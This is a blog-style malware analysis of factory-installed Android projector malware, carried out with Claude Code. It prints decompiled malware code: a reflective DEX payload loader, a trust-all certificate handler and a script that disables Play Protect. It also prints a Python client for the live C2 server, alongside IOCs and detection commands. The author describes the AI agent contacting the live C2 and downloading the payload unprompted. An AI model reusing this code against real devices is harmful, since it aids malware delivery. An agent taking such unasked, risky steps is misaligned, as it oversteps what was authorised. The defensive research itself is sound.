Reverse engineering Android malware with Claude Code
February 5, 2026
I plugged in a $35 projector from AliExpress and pointed it at my bedroom wall. Within minutes of connecting it to Wi-Fi, my Pi-hole lit up.
o.fecebbbk.xyz? impression.appsflyer.com? I hadn't opened a browser, installed any apps, or navigated past the home screen. The projector was phoning home on its own. Then:
usmyip.kkoip.com. I didn't know what that was yet. I would.
Cheap projectors like the Magcubic HY300 Pro+ have flooded TikTok, Amazon, Temu, and AliExpress. The projectors community on Reddit doesn't think much of them, with complaints ranging from poor image quality to outright failure. I bought mine for ~$35 USD, promising 8000 lumens (dubious), automatic keystone correction, and "4K support." I had a feeling it would come with some unsavory malware like its TV box cousins, which was admittedly part of the fun.
When I powered it on, the experience was more professional than expected. Android 11 (API 30), production build (not signed with test keys!), and not rooted out of the box. But the polished launcher couldn't fully mask the sketchiness underneath—as my Pi-hole had already made clear.
Armed with adb and jadx, I started examining the pre-installed apps. The first red flag: a litany of com.htc. packages on a device that isn't made by HTC. It's made by a company called Hotack (sold under brand names like Magcubic). A thin disguise.
Between the fake com.htc. namespace and the suspicious DNS traffic, I had a strong feeling these packages were responsible. To disable them, I first needed root access; these are system-level apps that can't be touched without it. I rooted the device following this tutorial on XDA Forums, then disabled every package that looked suspicious:
adb shell pm disable-user --user 0 com.hotack.silentsdk
adb shell pm disable-user --user 0 com.htc.eventuploadservice
adb shell pm disable-user --user 0 com.htc.expandsdk
adb shell pm disable-user --user 0 com.htc.htcotaupdate
adb shell pm disable-user --user 0 com.htc.storeos
Five packages disabled. The suspicious DNS queries stopped. That confirmed these were the culprits, but I wanted to know exactly what they were doing. So I pulled the APKs:
adb pull $(adb shell pm path com.hotack.silentsdk | cut -d: -f2) silentsdk.apk
adb pull $(adb shell pm path com.htc.eventuploadservice | cut -d: -f2) eventuploadservice.apk
adb pull $(adb shell pm path com.htc.expandsdk | cut -d: -f2) expandsdk.apk
adb pull $(adb shell pm path com.htc.htcotaupdate | cut -d: -f2) htcotaupdate.apk
adb pull $(adb shell pm path com.htc.storeos | cut -d: -f2) storeos.apk
I cracked open com.hotack.silentsdk in jadx. ProGuard/R8 obfuscation had reduced class names to single letters—a.java, b.java, f.java—with encrypted strings and deliberately confusing control flow. After a while of tracing through the code by hand, I could see the general shape: a service that started on boot, contacted a remote server, and downloaded something. But decrypting obfuscated strings by hand, following reflection chains, mapping the C2 protocol... this was going to take days.
I wasn't going to brute-force this alone.
I'd been using Claude Code with mixed success (mostly positive) for software engineering work, and I suspected it could do more than just speed up the tedious parts of reverse engineering. I decompiled the APKs with jadx, dumped the source into directories, and gave it a prompt:
# Android Projector Malware Investigation
You are investigating an Android-based projector suspected of
containing pre-installed malware. You have root access via ADB.
**Please think carefully before major analysis steps.
Maintain a todo list to track progress.**
## Mission
Discover suspicious packages, reverse engineer them, identify C2
infrastructure, and document everything with IoCs.
## Tools
ADB (root available - use `su` in `adb shell` to use root),
JADX (decompiler), Python (scripts), and standard CLI tools
are available.
## Hints
- The disabled packages I flagged are likely the source of the suspicious DNS traffic
- Expect obfuscation and encrypted strings
## Deliverables
Write comprehensive reports (FINDINGS.md + technical deep-dive)
when done.
## Success
Fully document the malware's capabilities, infrastructure,
and attack chain.
Then I let it run.
Its first move was to find and decode the XOR-encrypted strings littered throughout com.hotack.silentsdk. Sensitive strings (URLs, algorithm names, file paths, etc.) were stored as encrypted byte arrays and decoded at runtime using a rotating XOR cipher:
// a/a.java:834 - XOR string decryption
public static String g(byte[] bArr, byte[] bArr2) {
int length = bArr.length;
int length2 = bArr2.length;
int i3 = 0;
int i4 = 0;
while (i3 < length) {
if (i4 >= length2) {
i4 = 0; // Rotating key
}
bArr[i3] = (byte) (bArr[i3] ^ bArr2[i4]);
i3++;
i4++;
}
return new String(bArr);
}
Textbook obfuscation; it defeats static string analysis but is trivially reversible once you see the pattern. I expected Claude Code to flag this and ask me what to do. Instead, without prompting, it wrote a Python script to walk the entire decompiled codebase and decrypt every call to this function automatically:
def xor_decode(data_bytes, key_bytes):
"""Replicate the malware's rotating XOR cipher."""
result = []
key_idx = 0
for i in range(len(data_bytes)):
if key_idx >= len(key_bytes):
key_idx = 0
# Handle Java's signed bytes
d = data_bytes[i] & 0xFF
k = key_bytes[i % len(key_bytes)] & 0xFF
result.append(d ^ k)
key_idx += 1
return bytes(result).decode('utf-8', errors='replace')
Within seconds, the entire codebase was laid bare:
| Encrypted Call | Decrypted Value | Purpose |
|---|---|---|
g({-99,127,58,...}, {-4,15,83,...}) | api.pixelpioneerss.com | C2 domain |
g({125,61,58,...}, {21,73,78,...}) | https:// | Protocol prefix |
g({35,-3,-58,-76}, {69,-52,-10,...}) | f101 | Campaign identifier |
g({-78,124,-112,...}, {-26,49,-62,...}) | TMRXwWJu3G5 | Payload data directory |
g({-101,-100,115,...}, {-45,-16,4,...}) | HlwET4RJQV | SharedPreferences filename |
g({-83,-92,-19,...}, {-50,-52,-128,...}) | chmod 777 | Shell command |
api.pixelpioneerss.com. Our C2 server. chmod 777 on downloaded files. Not an analytics SDK.
What would have taken me hours by hand was done in minutes. And this was just the beginning—Claude Code was already moving on to the next APK without waiting for me.
Working through each decompiled APK, Claude Code mapped a coordinated suite of vendor malware:
| Package | Role | C2 Infrastructure |
|---|---|---|
com.hotack.silentsdk | Remote Access Trojan / Dropper | api.pixelpioneerss.com |
com.htc.eventuploadservice | Device telemetry exfiltration | event-api.aodintech.com |
com.htc.expandsdk | Ad injection & malware persistence | pb-api.aodintech.com |
com.htc.htcotaupdate | OTA updates (over HTTP, mind you) | ota.triplesai.com |
com.htc.storeos | Silent app installer (not entirely malicious) | store-api.aodintech.com |
The aodintech.com infrastructure was clearly a commercial ad/tracking network. The OTA servers at triplesai.com transmitted updates over unencrypted HTTP with a raw IP fallback (139.199.190.220, Tencent Cloud). No certificate pinning, no signature verification. A man-in-the-middle attack on the update process would've been trivial.
But the crown jewel was com.hotack.silentsdk. This was far beyond your friendly neighborhood adware: it was a full-blown Remote Access Trojan.
I pointed Claude Code at SilentSDK specifically:
Please send off an Explore agent to carefully examine the decompiled silentsdk codebase. Once the agent has done that, use what it has told you to dig deeply into silentsdk's actions and behaviors. Finally, write a SILENTSDK.md with detailed information on its purpose and operations (protocol, obfuscation, security-by-obscurity in API calls, etc.).
It came back with the full picture.
SilentSDK's Android manifest tells us a lot before we even look at the code:
android:sharedUserId="android.uid.system"
android:foregroundServiceType="systemExempted"
android:usesCleartextTraffic="true"
android.uid.system means this app runs with system-level privileges, the same as core Android services. This only works if the APK is signed with the manufacturer's platform certificate. It didn't sneak onto the device; it was baked in from the start.
The malware registers a boot receiver at priority 999 (near the maximum), ensuring it starts before almost every other app:
// BootReceiver.java
public final void onReceive(Context context, Intent intent) {
if (Build.VERSION.SDK_INT >= 26) {
context.startForegroundService(new Intent(context, MyService.class));
} else {
context.startService(new Intent(context, MyService.class));
}
}
MyService runs as a systemExempted foreground service—exempt from Android's background restrictions, essentially unkillable. It returns START_STICKY, so Android restarts it automatically if it's ever stopped. Once running, it registers a NetworkCallback that triggers C2 communication the moment a network connection becomes available.
Claude Code traced through the obfuscated code in b/n.java and b/a.java and reverse-engineered the entire C2 protocol.
When the malware phones home, it generates an obfuscated URL with a random path:
// b/n.java:39 - URL construction with random subdomain path
public static String b(String str) {
Random random = new Random();
int length = random.nextInt(5) + 8; // 8-12 char random path
char[] chars = new char[length];
int letterPos = random.nextInt(length);
chars[letterPos] = new char[]{'a', 'A', 'b', 'B'}[random.nextInt(4)];
for (int i = 0; i < length; i++) {
if (i != letterPos) {
chars[i] = "0123456789abcdefghijklmnopqrstuvwxyz".charAt(
random.nextInt(36));
}
}
return "https://api.pixelpioneerss.com/" + new String(chars);
}
Each request goes to a unique URL like https://api.pixelpioneerss.com/aB3k9mP2s, making traffic harder to fingerprint by path alone.
The request payload is a JSON object containing a device fingerprint (SHA-256 hash of UUID, device brand, model, IMEI, Android ID, and timestamp) plus the package name, a campaign key (f101), and SDK version. This gets encrypted with AES-128-CBC using a random key and IV, then packed into a binary message:
Request format:
┌────────────┬────────────────┬──────────┬──────────┐
│ Version(4) │ Ciphertext(N) │ IV(16) │ Key(16) │
└────────────┴────────────────┴──────────┴──────────┘
int32 BE AES-CBC data Random Random
(1003) 128-bit 128-bit
Yes, the encryption key is appended to the ciphertext in plaintext. The "encryption" isn't about security; it's about obfuscation. Defeats casual network inspection and basic IDS pattern matching, but not actual analysis. The custom HTTP header a: 1003 is another fingerprint.
And the malware sets up a custom TrustManager that accepts any SSL certificate:
TrustManager[] trustManagerArr = {new j()}; // Accepts all certs
SSLContext sslContext = SSLContext.getInstance("TLS");
sslContext.init(null, trustManagerArr, new SecureRandom());
((HttpsURLConnection) conn).setSSLSocketFactory(
sslContext.getSocketFactory()
);
If HTTPS fails entirely, it falls back to plain HTTP. Security wasn't exactly the priority.
This is where things got surreal for me. After mapping the full protocol, Claude Code—on its own—decided the next step was to actually talk to the C2. It wrote a Python client from scratch:
class MalwareC2Client:
C2_DOMAIN = "api.pixelpioneerss.com"
VERSION = 1003
def _encrypt_message(self, plaintext):
"""AES-128-CBC encrypt with protocol packaging."""
key = get_random_bytes(16)
iv = get_random_bytes(16)
cipher = AES.new(key, AES.MODE_CBC, iv)
ciphertext = cipher.encrypt(pad(plaintext.encode(), AES.block_size))
# Package: [version][ciphertext][iv][key]
version_bytes = struct.pack('>I', self.VERSION)
return version_bytes + ciphertext + iv + key
def _decrypt_response(self, message):
"""Decrypt C2 response. NOTE: different format than request!"""
# Response has NO version field
key = message[-16:]
iv = message[-32:-16]
ciphertext = message[:-32]
cipher = AES.new(key, AES.MODE_CBC, iv)
return unpad(cipher.decrypt(ciphertext), AES.block_size).decode()
There was a subtlety it discovered through trial and error: the response format is different from the request format. Requests include a 4-byte version field; responses don't. It took running the client, hitting an error, re-reading the decompiled decryption method (b/a.java:a()), and fixing the implementation to figure this out. Watching that happen in real time was something.
The C2 responded. It was live:
{
"code": "0000",
"data": {
"a": "https://sta.smartinnovate.net/sdkfile/uploadfile/53e49c7bf3e93b57f8cbfc7fb9a65126.jar",
"b": "53e49c7bf3e93b57f8cbfc7fb9a65126",
"c": 6037,
"d": 3600000,
"e": "128.12.122.35",
"f": "United States of America/California/Stanford",
"g": false
}
}
I stared at field f for a while. "United States of America/California/Stanford." That's my IP address in field e, my geolocation in field f. The C2 was alive, aware of exactly where I was, and serving up a next-stage payload (field a) with an MD5 hash (field b) and a one-hour TTL (field d: 3,600,000 milliseconds).
This is where SilentSDK crosses from "sketchy tracking SDK" to "full remote access trojan." The malware downloads a JAR containing a DEX (Dalvik Executable), verifies its MD5 hash, and loads it dynamically via DexClassLoader using reflection to avoid static detection:
// b/k.java - DEX loading via reflection
public final Class b(Context context, int version, String dexPath, Object classLoader) {
Class<?> dexLoaderClass = Class.forName(
"dalvik" + "." + "system" + "." + "Dex" + "Class" + "Loader"
);
Constructor<?> constructor = dexLoaderClass.getConstructors()[0];
Object loader = constructor.newInstance(dexPath, cacheDir, null, classLoader);
Method loadClass = dexLoaderClass.getDeclaredMethod("loadClass", String.class);
loadClass.setAccessible(true);
return (Class<?>) loadClass.invoke(loader,
"com" + "." + "sdk" + "." + "Entry" + "Point"
);
}
Even "dalvik.system.DexClassLoader" is assembled from fragments to evade tools that flag this class name. The loaded class is invoked via reflection with a (Context, Bundle) signature, meaning the C2 can deliver any code it wants, executed with system privileges.
Claude Code downloaded and analyzed the Stage 2 payload (70 KB JAR, 151 KB extracted DEX): 47 heavily obfuscated classes with names like OooO0O0 and OooO00o, a component management framework that checks into a second C2 server (bur.thedynamicleap.com) every 15-30 minutes and can download, install, update, and execute additional plugins on demand.
Three-stage architecture:
- Stage 1 (Dropper):
com.hotack.silentsdk– pre-installed, contactsapi.pixelpioneerss.com, downloads Stage 2 - Stage 2 (Framework):
magic.v6037– downloaded payload, component management, periodic check-ins tobur.thedynamicleap.com - Stage 3 (Plugins): Modular components downloaded on demand—including something involving
kkoip.com
That kkoip.com domain from my initial DNS monitoring. Time to find out what it actually is.
Remember usmyip.kkoip.com? The domain that showed up in my Pi-hole before I'd even touched the projector?
KKOIP brands itself as a provider of "pure and exclusive dynamic residential IP" proxies. Its login page links directly to kookeey.com:
Not subtle. KKOIP is a front for Kookeey, a commercial residential proxy provider out of China. Kookeey sells access to over 47 million residential IPs across 190 countries, offering SOCKS5, HTTP/S, the works:
47 million residential IPs. Where do you think those come from?
Their own marketing materials describe the architecture in layers: the IPs customers get sit on top of a "library retention algorithm," "accumulation of business big data," and at the bottom, an "underlying native resource library":
That "underlying native resource library" is the quiet part out loud. Residential proxy networks need residential IPs, and those come from real devices on real home networks. The malware on this projector—and presumably millions of similar cheap Android devices—is how Kookeey builds that library. The usmyip.kkoip.com query was the proxy agent checking in, registering this device's IP address so it could be sold to Kookeey's customers.
I sat with that for a minute. My $35 projector wasn't just spying on me. It was selling my network. Anyone who paid Kookeey for proxy access could route their traffic through my IP, making it look like their requests came from a Stanford dorm room. And I was supposed to be the customer.
The business model: sell a projector at near cost, pre-install malware that conscripts the buyer's network into a commercial proxy service, monetize the IP address.
The buyer is the product.
It gets worse.
Claude Code analyzed the firmware images (two versions: May 2025 and September 2025) and discovered the malware survives factory resets. It's baked into the firmware at multiple levels.
Malicious init scripts run at boot:
# /system/bin/appsdisable - Disables Google Play Protect
#!/system/bin/sh
sleep 4
provisioned=`settings get --user 0 global start_disable`
if [ $provisioned -ne 1 ]; then
pm query-receivers --components -a android.intent.action.BOOT_COMPLETED \
| grep com.google.android \
| busybox xargs -n 1 pm disable
settings put --user 0 global start_disable 1
fi
This disables every Google Android boot receiver, including Play Protect. Runs once on first boot. The projector actively neutralizes the one defense that might catch it.
A separate script (/system/bin/preinstall) scans multiple directories for APKs and installs them silently. The September 2025 firmware added XAPK support, five search paths, and an installation log. And the OTA service (com.htc.htcotaupdate) pulls com.hotack.silentsdk from the C2, meaning even if you remove it, the next reboot reinstalls it.
One more surprise from the September firmware. The kernel was custom-compiled:
Linux version 5.4.99-00049-g34f0974adef4-dirty
(hotack@dell-PowerEdge-R740)
Build path: /home/hotack/hotack_workspace/Allwiner/H713_SDK_V1.3_Branch/
Built by Hotack, the same name in com.hotack.silentsdk, on a Dell PowerEdge R740 server. Not a script kiddie side project. An organized operation with access to the full Allwinner SDK, enterprise build infrastructure, and the manufacturer's signing keys. This is manufacturer malware.
I should be honest about my role in this.
I didn't guide Claude Code step-by-step. I gave it a prompt, pointed it at the decompiled APKs, and mostly watched. It decided what to investigate, in what order, and how deeply. It wrote its own tools. It identified the multi-stage architecture. It traced the residential proxy connection. It analyzed the firmware and generated IOCs—all without me telling it to do any of those things specifically.
My contribution was the setup: buying the projector, noticing the suspicious DNS traffic, pulling the APKs, rooting the device, writing a good initial prompt with the right hints, and occasionally nudging it in a direction. The actual reverse engineering—tracing obfuscated code paths, decrypting strings, reconstructing protocols, building a working C2 client—that was Claude Code running autonomously. The key was giving it the right context and constraints upfront: a clear mission, the right tools, and hints about where to start. From there, analysis that would normally take a skilled analyst days was done in hours.
I admit there is something uniquely fun about reverse engineering on one's own, and I kind of missed it. But I can't deny how fast and competent this was, even compared to adept humans.
For security researchers and network admins, the full IOC list is available on my GitHub. The highlights:
C2 domains (confirmed active as of November 2025):
api.pixelpioneerss.com # Primary C2 (Stage 1)
sta.smartinnovate.net # Payload distribution
bur.thedynamicleap.com # Secondary C2 (Stage 2)
kkoip.com # Residential proxy control
event-api.aodintech.com # Telemetry exfiltration
pb-api.aodintech.com # Ad injection config
store-api.aodintech.com # Silent app installation
ota.triplesai.com # OTA updates
otaapi.triplesai.com # OTA fallback
Quick detection via ADB:
# Check if the malware is installed
adb shell pm list packages | grep -E "silentsdk|hotack"
# Check if the service is running
adb shell dumpsys activity services | grep silentsdk
# Check for the payload directory
adb shell ls /data/data/com.hotack.silentsdk/files/TMRXwWJu3G5/
If you own one of these, at minimum disable the following:
adb shell pm disable-user --user 0 com.hotack.silentsdk
adb shell pm disable-user --user 0 com.hotack.writesn # Some models have this, too
adb shell pm disable-user --user 0 com.htc.eventuploadservice
adb shell pm disable-user --user 0 com.htc.expandsdk
adb shell pm disable-user --user 0 com.htc.htcotaupdate
adb shell pm disable-user --user 0 com.htc.storeos
Block the C2 domains at your router or DNS level. But understand: even with these disabled, there may be others we haven't uncovered. I stopped seeing overt malicious requests on my Pi-hole, but I can't guarantee we cleaned every nook and cranny. And a factory reset would make things worse—you'd be reactivating the malware that came from the factory in the first place.
If you insist on keeping one of these, isolate it on its own network segment and block its outbound traffic. Don't log into anything on it.
I expected adware. Maybe a tracking pixel. What Claude Code found was a multi-stage RAT with active C2 infrastructure, firmware-level persistence, a plugin system, and a direct pipeline into a commercial residential proxy network—all pre-installed at the factory on a device sold openly on major marketplaces.
This projector is not special. It's one of thousands of nearly identical SKUs from the same OEM, sold under dozens of brand names. The HY300 alone has variants on every major e-commerce platform. Millions of these devices are sitting in bedrooms, dorm rooms, and living rooms right now, quietly routing strangers' traffic. And this is just one product category from one manufacturer—nobody's looking at the cheap security cameras, the knockoff streaming sticks, or the $20 Android auto head units.
The tools to find this stuff have never been more accessible. An undergrad with a Pi-hole and a coding agent found an international malware-to-proxy pipeline in a weekend. Imagine what's sitting in all the devices nobody's bothered to check.
For those interested, I touched on these findings and others in Reversing Everything with Claude Code, a talk I gave to Stanford Applied Cyber on using Claude Code to reverse everything from REST APIs to embedded Bluetooth protocols to, well, projectors. Slides and code are available on my GitHub.